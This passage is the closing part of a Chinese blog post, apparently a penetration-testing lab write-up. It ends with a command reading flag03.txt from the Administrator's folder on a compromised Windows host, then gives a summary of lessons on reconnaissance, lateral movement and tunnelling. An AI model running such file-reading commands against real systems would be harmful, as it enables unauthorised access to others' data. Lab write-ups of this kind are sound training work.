&quot;type Users\Administrator\flag\flag03.txt&quot;</span><br></pre></td></tr></table></figure>

<p><img src="https://picture-1312228068.cos.ap-shanghai.myqcloud.com/202308232048716.png" alt="image-20230819224904240"></p>
<p>最后将获得的flag拼接起来即可；</p>
<h4 id="总结"><a href="#总结" class="headerlink" title="总结"></a>总结</h4><ul>
<li>信息收集：信息收集真的是渗透过程中的重中之重，flag2的时候没有对目标主机进行二次信息收集，导致把路走死了；</li>
<li>横向移动：虽然看了一些方法，但是做的还是太少了所以在进行判断的时候还是你叫吃力；</li>
<li>代理和隧道：这个真的玄学，多用几次解决报错和理解怎么做代理怎么搭隧道后面应该会慢慢好起来；</li>
</ul>

    </div>

    
    
    

    <footer class="post-footer">
          <div class="post-tags">
              <a href="/tags/web/" rel="tag"><i class="fa fa-tag"></i> web</a>
          </div>

        

          <div class="post-nav">
            <div class="post-nav-item">
                <a href="/2023/06/05/cc%E9%93%BE/" rel="prev" title="CC链">
                  <i class="fa fa-chevron-left"></i> CC链
                </a>
            </div>
            <div class="post-nav-item">
                <a href="/2023/08/28/%E6%98%A5%E7%A7%8B%E4%BA%91%E9%95%9C%20Brute4Road/" rel="next" title="春秋云镜 Brute4Road">
                  春秋云镜 Brute4Road <i class="fa fa-chevron-right"></i>
                </a>
            </div>
          </div>
    </footer>
  </article>
</div>






</div>
  </main>

  <footer class="footer">
    <div class="footer-inner">

  <div class="beian"><a href="https://beian.miit.gov.cn/" rel="noopener" target="_blank">浙ICP备2022023783号-1 </a>
  </div>

<div class="copyright">
  &copy; 
  <span itemprop="copyrightYear">2023</span>
  <span class="with-love">
    <i class="fa fa-heart"></i>
  </span>
  <span class="author" itemprop="copyrightHolder">nnnpc、commit、Eureka</span>
</div>

    </div>
  </footer>

  
  <script src="https://cdnjs.cloudflare.com/ajax/libs/animejs/3.2.1/anime.min.js" integrity="sha256-XL2inqUJaslATFnHdJOi9GfQ60on8Wx1C2H8DYiN1xY=" crossorigin="anonymous"></script>
  <script src="https://cdnjs.cloudflare.com/ajax/libs/next-theme-pjax/0.5.0/pjax.min.js" integrity="sha256-3NkoLDrmHLTYj7csHIZSr0MHAFTXth7Ua/DDt4MRUAg=" crossorigin="anonymous"></script>
<script src="/js/comments.js"></script><script src="/js/utils.js"></script><script src="/js/motion.js"></script><script src="/js/schemes/muse.js"></script><script src="/js/next-boot.js"></script><script src="/js/pjax.js"></script>

  
<script src="https://cdnjs.cloudflare.com/ajax/libs/hexo-generator-searchdb/1.4.0/search.js" integrity="sha256-vXZMYLEqsROAXkEw93GGIvaB2ab+QW6w3+1ahD9nXXA=" crossorigin="anonymous"></script>
<script src="/js/third-party/search/local-search.js"></script>





  





</body>
</html>
